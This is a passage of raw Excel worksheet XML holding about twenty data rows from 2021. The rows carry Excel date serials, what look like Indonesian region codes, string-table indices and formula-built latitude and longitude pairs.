        <v>3172050002</v>
      </c>
      <c r="N3732">
        <v>3172050</v>
      </c>
      <c r="O3732">
        <v>3172</v>
      </c>
      <c r="P3732">
        <v>31</v>
      </c>
      <c r="Q3732" t="s">
        <v>5749</v>
      </c>
      <c r="R3732" t="s">
        <v>358</v>
      </c>
      <c r="S3732" t="s">
        <v>49</v>
      </c>
      <c r="T3732" t="s">
        <v>33</v>
      </c>
      <c r="U3732" s="5">
        <v>10685774</v>
      </c>
      <c r="V3732" s="5" t="s">
        <v>17808</v>
      </c>
      <c r="W3732" s="5">
        <v>-628185</v>
      </c>
      <c r="X3732" t="s">
        <v>21194</v>
      </c>
      <c r="Y3732" t="str">
        <f t="shared" si="58"/>
        <v>-6.28185,106.85774</v>
      </c>
    </row>
    <row r="3733" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3733">
        <v>288287</v>
      </c>
      <c r="B3733" s="1">
        <v>44309</v>
      </c>
      <c r="C3733" s="2">
        <v>0.49583333333333335</v>
      </c>
      <c r="D3733" t="s">
        <v>2648</v>
      </c>
      <c r="E3733" t="s">
        <v>23</v>
      </c>
      <c r="G3733" t="s">
        <v>12351</v>
      </c>
      <c r="H3733" t="s">
        <v>26</v>
      </c>
      <c r="J3733" t="s">
        <v>5747</v>
      </c>
      <c r="L3733" t="s">
        <v>12352</v>
      </c>
      <c r="M3733">
        <v>3172050002</v>
      </c>
      <c r="N3733">
        <v>3172050</v>
      </c>
      <c r="O3733">
        <v>3172</v>
      </c>
      <c r="P3733">
        <v>31</v>
      </c>
      <c r="Q3733" t="s">
        <v>5749</v>
      </c>
      <c r="R3733" t="s">
        <v>358</v>
      </c>
      <c r="S3733" t="s">
        <v>49</v>
      </c>
      <c r="T3733" t="s">
        <v>33</v>
      </c>
      <c r="U3733" s="5">
        <v>10685779</v>
      </c>
      <c r="V3733" s="5" t="s">
        <v>15183</v>
      </c>
      <c r="W3733" s="5">
        <v>-628190</v>
      </c>
      <c r="X3733" t="s">
        <v>21544</v>
      </c>
      <c r="Y3733" t="str">
        <f t="shared" si="58"/>
        <v>-6.28190,106.85779</v>
      </c>
    </row>
    <row r="3734" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3734">
        <v>289144</v>
      </c>
      <c r="B3734" s="1">
        <v>44312</v>
      </c>
      <c r="C3734" s="2">
        <v>0.43818287037037035</v>
      </c>
      <c r="D3734" t="s">
        <v>22</v>
      </c>
      <c r="E3734" t="s">
        <v>23</v>
      </c>
      <c r="F3734" t="s">
        <v>12353</v>
      </c>
      <c r="G3734" t="s">
        <v>12354</v>
      </c>
      <c r="H3734" t="s">
        <v>7086</v>
      </c>
      <c r="I3734" t="s">
        <v>12222</v>
      </c>
      <c r="J3734" t="s">
        <v>2627</v>
      </c>
      <c r="L3734" t="s">
        <v>12355</v>
      </c>
      <c r="M3734">
        <v>3277030002</v>
      </c>
      <c r="N3734">
        <v>3277030</v>
      </c>
      <c r="O3734">
        <v>3277</v>
      </c>
      <c r="P3734">
        <v>32</v>
      </c>
      <c r="Q3734" t="s">
        <v>12356</v>
      </c>
      <c r="R3734" t="s">
        <v>12357</v>
      </c>
      <c r="S3734" t="s">
        <v>7776</v>
      </c>
      <c r="T3734" t="s">
        <v>42</v>
      </c>
      <c r="U3734" s="5">
        <v>10755703</v>
      </c>
      <c r="V3734" s="5" t="s">
        <v>17809</v>
      </c>
      <c r="W3734" s="5">
        <v>-687412</v>
      </c>
      <c r="X3734" t="s">
        <v>21545</v>
      </c>
      <c r="Y3734" t="str">
        <f t="shared" si="58"/>
        <v>-6.87412,107.55703</v>
      </c>
    </row>
    <row r="3735" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3735">
        <v>289146</v>
      </c>
      <c r="B3735" s="1">
        <v>44312</v>
      </c>
      <c r="C3735" s="2">
        <v>0.54299768518518521</v>
      </c>
      <c r="D3735" t="s">
        <v>22</v>
      </c>
      <c r="E3735" t="s">
        <v>23</v>
      </c>
      <c r="F3735" t="s">
        <v>12358</v>
      </c>
      <c r="H3735" t="s">
        <v>26</v>
      </c>
      <c r="I3735" t="s">
        <v>1055</v>
      </c>
      <c r="J3735" t="s">
        <v>3135</v>
      </c>
      <c r="L3735" t="s">
        <v>12359</v>
      </c>
      <c r="M3735">
        <v>3671010012</v>
      </c>
      <c r="N3735">
        <v>3671010</v>
      </c>
      <c r="O3735">
        <v>3671</v>
      </c>
      <c r="P3735">
        <v>36</v>
      </c>
      <c r="Q3735" t="s">
        <v>12337</v>
      </c>
      <c r="R3735" t="s">
        <v>200</v>
      </c>
      <c r="S3735" t="s">
        <v>201</v>
      </c>
      <c r="T3735" t="s">
        <v>171</v>
      </c>
      <c r="U3735" s="5">
        <v>10671556</v>
      </c>
      <c r="V3735" s="5" t="s">
        <v>17810</v>
      </c>
      <c r="W3735" s="5">
        <v>-624282</v>
      </c>
      <c r="X3735" t="s">
        <v>21546</v>
      </c>
      <c r="Y3735" t="str">
        <f t="shared" si="58"/>
        <v>-6.24282,106.71556</v>
      </c>
    </row>
    <row r="3736" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3736">
        <v>289154</v>
      </c>
      <c r="B3736" s="1">
        <v>44313</v>
      </c>
      <c r="C3736" s="2">
        <v>0.39564814814814814</v>
      </c>
      <c r="D3736" t="s">
        <v>22</v>
      </c>
      <c r="E3736" t="s">
        <v>23</v>
      </c>
      <c r="F3736" t="s">
        <v>12360</v>
      </c>
      <c r="H3736" t="s">
        <v>7086</v>
      </c>
      <c r="I3736" t="s">
        <v>7410</v>
      </c>
      <c r="J3736" t="s">
        <v>2627</v>
      </c>
      <c r="L3736" t="s">
        <v>12361</v>
      </c>
      <c r="M3736">
        <v>3275011001</v>
      </c>
      <c r="N3736">
        <v>3275011</v>
      </c>
      <c r="O3736">
        <v>3275</v>
      </c>
      <c r="P3736">
        <v>32</v>
      </c>
      <c r="Q3736" t="s">
        <v>12362</v>
      </c>
      <c r="R3736" t="s">
        <v>12363</v>
      </c>
      <c r="S3736" t="s">
        <v>41</v>
      </c>
      <c r="T3736" t="s">
        <v>42</v>
      </c>
      <c r="U3736" s="5">
        <v>10691916</v>
      </c>
      <c r="V3736" s="5" t="s">
        <v>17811</v>
      </c>
      <c r="W3736" s="5">
        <v>-638927</v>
      </c>
      <c r="X3736" t="s">
        <v>21547</v>
      </c>
      <c r="Y3736" t="str">
        <f t="shared" si="58"/>
        <v>-6.38927,106.91916</v>
      </c>
    </row>
    <row r="3737" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3737">
        <v>289155</v>
      </c>
      <c r="B3737" s="1">
        <v>44313</v>
      </c>
      <c r="C3737" s="2">
        <v>0.45096064814814812</v>
      </c>
      <c r="D3737" t="s">
        <v>22</v>
      </c>
      <c r="E3737" t="s">
        <v>23</v>
      </c>
      <c r="F3737" t="s">
        <v>12364</v>
      </c>
      <c r="G3737" t="s">
        <v>12365</v>
      </c>
      <c r="H3737" t="s">
        <v>7086</v>
      </c>
      <c r="I3737" t="s">
        <v>7733</v>
      </c>
      <c r="J3737" t="s">
        <v>2627</v>
      </c>
      <c r="L3737" t="s">
        <v>12366</v>
      </c>
      <c r="M3737">
        <v>3202040007</v>
      </c>
      <c r="N3737">
        <v>3202040</v>
      </c>
      <c r="O3737">
        <v>3202</v>
      </c>
      <c r="P3737">
        <v>32</v>
      </c>
      <c r="Q3737" t="s">
        <v>6715</v>
      </c>
      <c r="R3737" t="s">
        <v>12367</v>
      </c>
      <c r="S3737" t="s">
        <v>7762</v>
      </c>
      <c r="T3737" t="s">
        <v>42</v>
      </c>
      <c r="U3737" s="5">
        <v>10662117</v>
      </c>
      <c r="V3737" s="5" t="s">
        <v>17812</v>
      </c>
      <c r="W3737" s="5">
        <v>-724564</v>
      </c>
      <c r="X3737" t="s">
        <v>21548</v>
      </c>
      <c r="Y3737" t="str">
        <f t="shared" si="58"/>
        <v>-7.24564,106.62117</v>
      </c>
    </row>
    <row r="3738" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3738">
        <v>289157</v>
      </c>
      <c r="B3738" s="1">
        <v>44314</v>
      </c>
      <c r="C3738" s="2">
        <v>2.8611111111111115E-2</v>
      </c>
      <c r="D3738" t="s">
        <v>22</v>
      </c>
      <c r="E3738" t="s">
        <v>23</v>
      </c>
      <c r="F3738" t="s">
        <v>12368</v>
      </c>
      <c r="G3738" t="s">
        <v>12369</v>
      </c>
      <c r="H3738" t="s">
        <v>7086</v>
      </c>
      <c r="I3738" t="s">
        <v>7087</v>
      </c>
      <c r="J3738" t="s">
        <v>2627</v>
      </c>
      <c r="L3738" t="s">
        <v>12370</v>
      </c>
      <c r="M3738">
        <v>3202121003</v>
      </c>
      <c r="N3738">
        <v>3202121</v>
      </c>
      <c r="O3738">
        <v>3202</v>
      </c>
      <c r="P3738">
        <v>32</v>
      </c>
      <c r="Q3738" t="s">
        <v>12371</v>
      </c>
      <c r="R3738" t="s">
        <v>12371</v>
      </c>
      <c r="S3738" t="s">
        <v>7762</v>
      </c>
      <c r="T3738" t="s">
        <v>42</v>
      </c>
      <c r="U3738" s="5">
        <v>10669374</v>
      </c>
      <c r="V3738" s="5" t="s">
        <v>17813</v>
      </c>
      <c r="W3738" s="5">
        <v>-698782</v>
      </c>
      <c r="X3738" t="s">
        <v>21549</v>
      </c>
      <c r="Y3738" t="str">
        <f t="shared" si="58"/>
        <v>-6.98782,106.69374</v>
      </c>
    </row>
    <row r="3739" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3739">
        <v>289160</v>
      </c>
      <c r="B3739" s="1">
        <v>44314</v>
      </c>
      <c r="C3739" s="2">
        <v>0.49444444444444446</v>
      </c>
      <c r="D3739" t="s">
        <v>2648</v>
      </c>
      <c r="E3739" t="s">
        <v>23</v>
      </c>
      <c r="G3739" t="s">
        <v>12372</v>
      </c>
      <c r="H3739" t="s">
        <v>26</v>
      </c>
      <c r="J3739" t="s">
        <v>2580</v>
      </c>
      <c r="L3739" t="s">
        <v>12373</v>
      </c>
      <c r="M3739">
        <v>3172040005</v>
      </c>
      <c r="N3739">
        <v>3172040</v>
      </c>
      <c r="O3739">
        <v>3172</v>
      </c>
      <c r="P3739">
        <v>31</v>
      </c>
      <c r="Q3739" t="s">
        <v>1351</v>
      </c>
      <c r="R3739" t="s">
        <v>281</v>
      </c>
      <c r="S3739" t="s">
        <v>49</v>
      </c>
      <c r="T3739" t="s">
        <v>33</v>
      </c>
      <c r="U3739" s="5">
        <v>10689378</v>
      </c>
      <c r="V3739" s="5" t="s">
        <v>16273</v>
      </c>
      <c r="W3739" s="5">
        <v>-624110</v>
      </c>
      <c r="X3739" t="s">
        <v>21550</v>
      </c>
      <c r="Y3739" t="str">
        <f t="shared" si="58"/>
        <v>-6.24110,106.89378</v>
      </c>
    </row>
    <row r="3740" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3740">
        <v>289185</v>
      </c>
      <c r="B3740" s="1">
        <v>44314</v>
      </c>
      <c r="C3740" s="2">
        <v>0.57986111111111105</v>
      </c>
      <c r="D3740" t="s">
        <v>2648</v>
      </c>
      <c r="E3740" t="s">
        <v>23</v>
      </c>
      <c r="G3740" t="s">
        <v>12374</v>
      </c>
      <c r="H3740" t="s">
        <v>26</v>
      </c>
      <c r="J3740" t="s">
        <v>404</v>
      </c>
      <c r="L3740" t="s">
        <v>12375</v>
      </c>
      <c r="M3740">
        <v>3174020005</v>
      </c>
      <c r="N3740">
        <v>3174020</v>
      </c>
      <c r="O3740">
        <v>3174</v>
      </c>
      <c r="P3740">
        <v>31</v>
      </c>
      <c r="Q3740" t="s">
        <v>30</v>
      </c>
      <c r="R3740" t="s">
        <v>31</v>
      </c>
      <c r="S3740" t="s">
        <v>32</v>
      </c>
      <c r="T3740" t="s">
        <v>33</v>
      </c>
      <c r="U3740" s="5">
        <v>10677082</v>
      </c>
      <c r="V3740" s="5" t="s">
        <v>17814</v>
      </c>
      <c r="W3740" s="5">
        <v>-616643</v>
      </c>
      <c r="X3740" t="s">
        <v>20853</v>
      </c>
      <c r="Y3740" t="str">
        <f t="shared" si="58"/>
        <v>-6.16643,106.77082</v>
      </c>
    </row>
    <row r="3741" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3741">
        <v>289190</v>
      </c>
      <c r="B3741" s="1">
        <v>44314</v>
      </c>
      <c r="C3741" s="2">
        <v>0.58611111111111114</v>
      </c>
      <c r="D3741" t="s">
        <v>2648</v>
      </c>
      <c r="E3741" t="s">
        <v>23</v>
      </c>
      <c r="G3741" t="s">
        <v>12376</v>
      </c>
      <c r="H3741" t="s">
        <v>26</v>
      </c>
      <c r="J3741" t="s">
        <v>11367</v>
      </c>
      <c r="L3741" t="s">
        <v>12377</v>
      </c>
      <c r="M3741">
        <v>3174020006</v>
      </c>
      <c r="N3741">
        <v>3174020</v>
      </c>
      <c r="O3741">
        <v>3174</v>
      </c>
      <c r="P3741">
        <v>31</v>
      </c>
      <c r="Q3741" t="s">
        <v>427</v>
      </c>
      <c r="R3741" t="s">
        <v>31</v>
      </c>
      <c r="S3741" t="s">
        <v>32</v>
      </c>
      <c r="T3741" t="s">
        <v>33</v>
      </c>
      <c r="U3741" s="5">
        <v>10676490</v>
      </c>
      <c r="V3741" s="5" t="s">
        <v>17815</v>
      </c>
      <c r="W3741" s="5">
        <v>-618502</v>
      </c>
      <c r="X3741" t="s">
        <v>21551</v>
      </c>
      <c r="Y3741" t="str">
        <f t="shared" si="58"/>
        <v>-6.18502,106.76490</v>
      </c>
    </row>
    <row r="3742" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3742">
        <v>290164</v>
      </c>
      <c r="B3742" s="1">
        <v>44318</v>
      </c>
      <c r="C3742" s="2">
        <v>0.74606481481481479</v>
      </c>
      <c r="D3742" t="s">
        <v>22</v>
      </c>
      <c r="E3742" t="s">
        <v>23</v>
      </c>
      <c r="F3742" t="s">
        <v>12378</v>
      </c>
      <c r="H3742" t="s">
        <v>7086</v>
      </c>
      <c r="I3742" t="s">
        <v>12293</v>
      </c>
      <c r="J3742" t="s">
        <v>7509</v>
      </c>
      <c r="L3742" t="s">
        <v>12379</v>
      </c>
      <c r="M3742">
        <v>1377020004</v>
      </c>
      <c r="N3742">
        <v>1377020</v>
      </c>
      <c r="O3742">
        <v>1377</v>
      </c>
      <c r="P3742">
        <v>13</v>
      </c>
      <c r="Q3742" t="s">
        <v>12380</v>
      </c>
      <c r="R3742" t="s">
        <v>12381</v>
      </c>
      <c r="S3742" t="s">
        <v>12382</v>
      </c>
      <c r="T3742" t="s">
        <v>7514</v>
      </c>
      <c r="U3742" s="5">
        <v>10013325</v>
      </c>
      <c r="V3742" s="5" t="s">
        <v>17816</v>
      </c>
      <c r="W3742" s="5">
        <v>-62916</v>
      </c>
      <c r="X3742" t="s">
        <v>21552</v>
      </c>
      <c r="Y3742" t="str">
        <f t="shared" si="58"/>
        <v xml:space="preserve"> -0.62916,100.13325</v>
      </c>
    </row>
    <row r="3743" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3743">
        <v>290165</v>
      </c>
      <c r="B3743" s="1">
        <v>44318</v>
      </c>
      <c r="C3743" s="2">
        <v>0.74655092592592587</v>
      </c>
      <c r="D3743" t="s">
        <v>22</v>
      </c>
      <c r="E3743" t="s">
        <v>23</v>
      </c>
      <c r="F3743" t="s">
        <v>12383</v>
      </c>
      <c r="H3743" t="s">
        <v>7086</v>
      </c>
      <c r="I3743" t="s">
        <v>7087</v>
      </c>
      <c r="J3743" t="s">
        <v>7509</v>
      </c>
      <c r="L3743" t="s">
        <v>12384</v>
      </c>
      <c r="M3743">
        <v>1377020007</v>
      </c>
      <c r="N3743">
        <v>1377020</v>
      </c>
      <c r="O3743">
        <v>1377</v>
      </c>
      <c r="P3743">
        <v>13</v>
      </c>
      <c r="Q3743" t="s">
        <v>12385</v>
      </c>
      <c r="R3743" t="s">
        <v>12381</v>
      </c>
      <c r="S3743" t="s">
        <v>12382</v>
      </c>
      <c r="T3743" t="s">
        <v>7514</v>
      </c>
      <c r="U3743" s="5">
        <v>10013270</v>
      </c>
      <c r="V3743" s="5" t="s">
        <v>17817</v>
      </c>
      <c r="W3743" s="5">
        <v>-62895</v>
      </c>
      <c r="X3743" t="s">
        <v>21553</v>
      </c>
      <c r="Y3743" t="str">
        <f t="shared" si="58"/>
        <v xml:space="preserve"> -0.62895,100.13270</v>
      </c>
    </row>
    <row r="3744" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3744">
        <v>290166</v>
      </c>
      <c r="B3744" s="1">
        <v>44319</v>
      </c>
      <c r="C3744" s="2">
        <v>4.6527777777777779E-2</v>
      </c>
      <c r="D3744" t="s">
        <v>2648</v>
      </c>
      <c r="E3744" t="s">
        <v>23</v>
      </c>
      <c r="G3744" t="s">
        <v>12386</v>
      </c>
      <c r="H3744" t="s">
        <v>26</v>
      </c>
      <c r="J3744" t="s">
        <v>498</v>
      </c>
      <c r="L3744" t="s">
        <v>12387</v>
      </c>
      <c r="M3744">
        <v>3171020006</v>
      </c>
      <c r="N3744">
        <v>3171020</v>
      </c>
      <c r="O3744">
        <v>3171</v>
      </c>
      <c r="P3744">
        <v>31</v>
      </c>
      <c r="Q3744" t="s">
        <v>499</v>
      </c>
      <c r="R3744" t="s">
        <v>484</v>
      </c>
      <c r="S3744" t="s">
        <v>108</v>
      </c>
      <c r="T3744" t="s">
        <v>33</v>
      </c>
      <c r="U3744" s="5">
        <v>10683563</v>
      </c>
      <c r="V3744" s="5" t="s">
        <v>14526</v>
      </c>
      <c r="W3744" s="5">
        <v>-626625</v>
      </c>
      <c r="X3744" t="s">
        <v>21554</v>
      </c>
      <c r="Y3744" t="str">
        <f t="shared" si="58"/>
        <v>-6.26625,106.83563</v>
      </c>
    </row>
    <row r="3745" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3745">
        <v>290202</v>
      </c>
      <c r="B3745" s="1">
        <v>44322</v>
      </c>
      <c r="C3745" s="2">
        <v>0.39885416666666668</v>
      </c>
      <c r="D3745" t="s">
        <v>22</v>
      </c>
      <c r="E3745" t="s">
        <v>23</v>
      </c>
      <c r="F3745" t="s">
        <v>12388</v>
      </c>
      <c r="G3745" t="s">
        <v>12389</v>
      </c>
      <c r="H3745" t="s">
        <v>26</v>
      </c>
      <c r="I3745" t="s">
        <v>2196</v>
      </c>
      <c r="J3745" t="s">
        <v>2627</v>
      </c>
      <c r="M3745">
        <v>3275010008</v>
      </c>
      <c r="N3745">
        <v>3275010</v>
      </c>
      <c r="O3745">
        <v>3275</v>
      </c>
      <c r="P3745">
        <v>32</v>
      </c>
      <c r="Q3745" t="s">
        <v>2236</v>
      </c>
      <c r="R3745" t="s">
        <v>287</v>
      </c>
      <c r="S3745" t="s">
        <v>41</v>
      </c>
      <c r="T3745" t="s">
        <v>42</v>
      </c>
      <c r="U3745" s="5">
        <v>10693628</v>
      </c>
      <c r="V3745" s="5" t="s">
        <v>17818</v>
      </c>
      <c r="W3745" s="5">
        <v>-627357</v>
      </c>
      <c r="X3745" t="s">
        <v>21555</v>
      </c>
      <c r="Y3745" t="str">
        <f t="shared" si="58"/>
        <v>-6.27357,106.93628</v>
      </c>
    </row>
    <row r="3746" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3746">
        <v>290203</v>
      </c>
      <c r="B3746" s="1">
        <v>44322</v>
      </c>
      <c r="C3746" s="2">
        <v>0.61803240740740739</v>
      </c>
      <c r="D3746" t="s">
        <v>22</v>
      </c>
      <c r="E3746" t="s">
        <v>23</v>
      </c>
      <c r="F3746" t="s">
        <v>12390</v>
      </c>
      <c r="H3746" t="s">
        <v>26</v>
      </c>
      <c r="I3746" t="s">
        <v>1538</v>
      </c>
      <c r="J3746" t="s">
        <v>2627</v>
      </c>
      <c r="L3746" t="s">
        <v>5093</v>
      </c>
      <c r="M3746">
        <v>3201190010</v>
      </c>
      <c r="N3746">
        <v>3201190</v>
      </c>
      <c r="O3746">
        <v>3201</v>
      </c>
      <c r="P3746">
        <v>32</v>
      </c>
      <c r="Q3746" t="s">
        <v>419</v>
      </c>
      <c r="R3746" t="s">
        <v>420</v>
      </c>
      <c r="S3746" t="s">
        <v>421</v>
      </c>
      <c r="T3746" t="s">
        <v>42</v>
      </c>
      <c r="U3746" s="5">
        <v>10697645</v>
      </c>
      <c r="V3746" s="5" t="s">
        <v>17819</v>
      </c>
      <c r="W3746" s="5">
        <v>-632349</v>
      </c>
      <c r="X3746" t="s">
        <v>21556</v>
      </c>
      <c r="Y3746" t="str">
        <f t="shared" si="58"/>
        <v>-6.32349,106.97645</v>
      </c>
    </row>
    <row r="3747" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3747">
        <v>290204</v>
      </c>
      <c r="B3747" s="1">
        <v>44322</v>
      </c>
      <c r="C3747" s="2">
        <v>0.67796296296296299</v>
      </c>
      <c r="D3747" t="s">
        <v>22</v>
      </c>
      <c r="E3747" t="s">
        <v>23</v>
      </c>
      <c r="F3747" t="s">
        <v>12391</v>
      </c>
      <c r="G3747" t="s">
        <v>12392</v>
      </c>
      <c r="H3747" t="s">
        <v>26</v>
      </c>
      <c r="I3747" t="s">
        <v>137</v>
      </c>
      <c r="J3747" t="s">
        <v>2627</v>
      </c>
      <c r="L3747" t="s">
        <v>12393</v>
      </c>
      <c r="M3747">
        <v>3201190010</v>
      </c>
      <c r="N3747">
        <v>3201190</v>
      </c>
      <c r="O3747">
        <v>3201</v>
      </c>
      <c r="P3747">
        <v>32</v>
      </c>
      <c r="Q3747" t="s">
        <v>419</v>
      </c>
      <c r="R3747" t="s">
        <v>420</v>
      </c>
      <c r="S3747" t="s">
        <v>421</v>
      </c>
      <c r="T3747" t="s">
        <v>42</v>
      </c>
      <c r="U3747" s="5">
        <v>10696757</v>
      </c>
      <c r="V3747" s="5" t="s">
        <v>17820</v>
      </c>
      <c r="W3747" s="5">
        <v>-630549</v>
      </c>
      <c r="X3747" t="s">
        <v>21557</v>
      </c>
      <c r="Y3747" t="str">
        <f t="shared" si="58"/>
        <v>-6.30549,106.96757</v>
      </c>
    </row>
    <row r="3748" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3748">
        <v>290206</v>
      </c>
      <c r="B3748" s="1">
        <v>44322</v>
      </c>
      <c r="C3748" s="2">
        <v>0.69693287037037033</v>
      </c>
      <c r="D3748" t="s">
        <v>85</v>
      </c>
      <c r="E3748" t="s">
        <v>23</v>
      </c>
      <c r="F3748" t="s">
        <v>12394</v>
      </c>
      <c r="G3748" t="s">
        <v>12395</v>
      </c>
      <c r="H3748" t="s">
        <v>26</v>
      </c>
      <c r="J3748" t="s">
        <v>12396</v>
      </c>
      <c r="K3748" t="s">
        <v>12397</v>
      </c>
      <c r="L3748" t="s">
        <v>12398</v>
      </c>
      <c r="M3748">
        <v>3172070003</v>
      </c>
      <c r="N3748">
        <v>3172070</v>
      </c>
      <c r="O3748">
        <v>3172</v>
      </c>
      <c r="P3748">
        <v>31</v>
      </c>
      <c r="Q3748" t="s">
        <v>2659</v>
      </c>
      <c r="R3748" t="s">
        <v>128</v>
      </c>
      <c r="S3748" t="s">
        <v>49</v>
      </c>
      <c r="T3748" t="s">
        <v>33</v>
      </c>
      <c r="U3748" s="5">
        <v>10694356</v>
      </c>
      <c r="V3748" s="5" t="s">
        <v>17821</v>
      </c>
      <c r="W3748" s="5">
        <v>-623535</v>
      </c>
      <c r="X3748" t="s">
        <v>21558</v>
      </c>
      <c r="Y3748" t="str">
        <f t="shared" si="58"/>
        <v>-6.23535,106.94356</v>
      </c>
    </row>
    <row r="3749" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3749">
        <v>290209</v>
      </c>
      <c r="B3749" s="1">
        <v>44324</v>
      </c>
      <c r="C3749" s="2">
        <v>0.27569444444444446</v>
      </c>
      <c r="D3749" t="s">
        <v>2648</v>
      </c>
      <c r="E3749" t="s">
        <v>23</v>
      </c>
      <c r="G3749" t="s">
        <v>12399</v>
      </c>
      <c r="H3749" t="s">
        <v>26</v>
      </c>
      <c r="J3749" t="s">
        <v>387</v>
      </c>
      <c r="L3749" t="s">
        <v>12400</v>
      </c>
      <c r="M3749">
        <v>3174040007</v>
      </c>
      <c r="N3749">
        <v>3174040</v>
      </c>
      <c r="O3749">
        <v>3174</v>
      </c>
      <c r="P3749">
        <v>31</v>
      </c>
      <c r="Q3749" t="s">
        <v>389</v>
      </c>
      <c r="R3749" t="s">
        <v>377</v>
      </c>
      <c r="S3749" t="s">
        <v>32</v>
      </c>
      <c r="T3749" t="s">
        <v>33</v>
      </c>
      <c r="U3749" s="5">
        <v>10678175</v>
      </c>
      <c r="V3749" s="5" t="s">
        <v>14514</v>
      </c>
      <c r="W3749" s="5">
        <v>-615098</v>
      </c>
      <c r="X3749" t="s">
        <v>21559</v>
      </c>
      <c r="Y3749" t="str">
        <f t="shared" si="58"/>
        <v>-6.15098,106.78175</v>
      </c>
    </row>
    <row r="3750" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3750">
        <v>290658</v>
      </c>
      <c r="B3750" s="1">
        <v>44332</v>
      </c>
      <c r="C3750" s="2">
        <v>0.37652777777777779</v>
      </c>
      <c r="D3750" t="s">
        <v>22</v>
      </c>
      <c r="E3750" t="s">
        <v>23</v>
      </c>
      <c r="F3750" t="s">
        <v>12401</v>
      </c>
      <c r="G3750" t="s">
        <v>12402</v>
      </c>
      <c r="H3750" t="s">
        <v>26</v>
      </c>
      <c r="I3750" t="s">
        <v>1005</v>
      </c>
      <c r="J3750" t="s">
        <v>12328</v>
      </c>
      <c r="M3750">
        <v>6503020004</v>
      </c>
      <c r="N3750">
        <v>6503020</v>
      </c>
      <c r="O3750">
        <v>6503</v>
      </c>
      <c r="P3750">
        <v>65</v>
      </c>
      <c r="Q3750" t="s">
        <v>12403</v>
      </c>
      <c r="R3750" t="s">
        <v>12404</v>
      </c>
      <c r="S3750" t="s">
        <v>12405</v>
      </c>
      <c r="T3750" t="s">
        <v>12333</v>
      </c>
      <c r="U3750" s="5">
        <v>11690643</v>
      </c>
      <c r="V3750" s="5" t="s">
        <v>17822</v>
      </c>
      <c r="W3750" s="5">
        <v>359904</v>
      </c>
      <c r="X3750" t="s">
        <v>21560</v>
      </c>
      <c r="Y3750" t="str">
        <f t="shared" si="58"/>
        <v>3.59904,116.90643</v>
      </c>
    </row>
    <row r="3751" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3751">
        <v>290659</v>
      </c>
      <c r="B3751" s="1">
        <v>44332</v>
      </c>
      <c r="C3751" s="2">
        <v>0.50209490740740736</v>
      </c>
      <c r="D3751" t="s">
        <v>22</v>
      </c>
      <c r="E3751" t="s">
        <v>23</v>
      </c>
      <c r="F3751" t="s">
        <v>12406</v>
      </c>
      <c r="G3751" t="s">
        <v>12407</v>
      </c>
      <c r="H3751" t="s">
        <v>26</v>
      </c>
      <c r="I3751" t="s">
        <v>517</v>
      </c>
      <c r="J3751" t="s">
        <v>2627</v>
      </c>
      <c r="L3751" t="s">
        <v>12408</v>
      </c>
      <c r="M3751">
        <v>3271030005</v>
      </c>
      <c r="N3751">
        <v>3271030</v>
      </c>
      <c r="O3751">
        <v>3271</v>
      </c>
      <c r="P3751">
        <v>32</v>
      </c>
      <c r="Q3751" t="s">
        <v>12409</v>
      </c>
      <c r="R3751" t="s">
        <v>12410</v>
      </c>
      <c r="S3751" t="s">
        <v>421</v>
      </c>
      <c r="T3751" t="s">
        <v>42</v>
      </c>
      <c r="U3751" s="5">
        <v>10682405</v>
      </c>
      <c r="V3751" s="5" t="s">
        <v>17823</v>
      </c>
      <c r="W3751" s="5">
        <v>-654810</v>
      </c>
      <c r="X3751" t="s">
        <v>21561</v>
      </c>
      <c r="Y3751" t="str">
        <f t="shared" si="58"/>
        <v>-6.54810,106.82405</v>
      </c>
    </row>
    <row r="3752" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3752">
        <v>290660</v>
      </c>
      <c r="B3752" s="1">
        <v>44333</v>
      </c>
      <c r="C3752" s="2">
        <v>0.26469907407407406</v>
      </c>
      <c r="D3752" t="s">
        <v>22</v>
      </c>
      <c r="E3752" t="s">
        <v>23</v>
      </c>
      <c r="F3752" t="s">
        <v>12411</v>
      </c>
      <c r="H3752" t="s">
        <v>26</v>
      </c>
      <c r="I3752" t="s">
        <v>380</v>
      </c>
      <c r="J3752" t="s">
        <v>7171</v>
      </c>
      <c r="L3752" t="s">
        <v>12412</v>
      </c>
      <c r="M3752">
        <v>6405050001</v>
      </c>
      <c r="N3752">
        <v>6405050</v>
      </c>
      <c r="O3752">
        <v>6405</v>
      </c>
      <c r="P3752">
        <v>64</v>
      </c>
      <c r="Q3752" t="s">
        <v>12413</v>
      </c>
      <c r="R3752" t="s">
        <v>12414</v>
      </c>
      <c r="S3752" t="s">
        <v>12415</v>
      </c>
      <c r="T3752" t="s">
        <v>1308</v>
      </c>
      <c r="U3752" s="5">
        <v>11724192</v>
      </c>
      <c r="V3752" s="5" t="s">
        <v>17824</v>
      </c>
      <c r="W3752" s="5">
        <v>180737</v>
      </c>
      <c r="X3752" t="s">
        <v>21562</v>
      </c>
      <c r="Y3752" t="str">
        <f t="shared" si="58"/>
        <v>1.80737,117.24192</v>
      </c>
    </row>
    <row r="3753" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3753">
        <v>290661</v>
      </c>
      <c r="B3753" s="1">
        <v>44333</v>
      </c>
      <c r="C3753" s="2">
        <v>0.43026620370370372</v>
      </c>
      <c r="D3753" t="s">
        <v>22</v>
      </c>
      <c r="E3753" t="s">
        <v>23</v>
      </c>
      <c r="F3753" t="s">
        <v>12416</v>
      </c>
      <c r="G3753" t="s">
        <v>12417</v>
      </c>
      <c r="H3753" t="s">
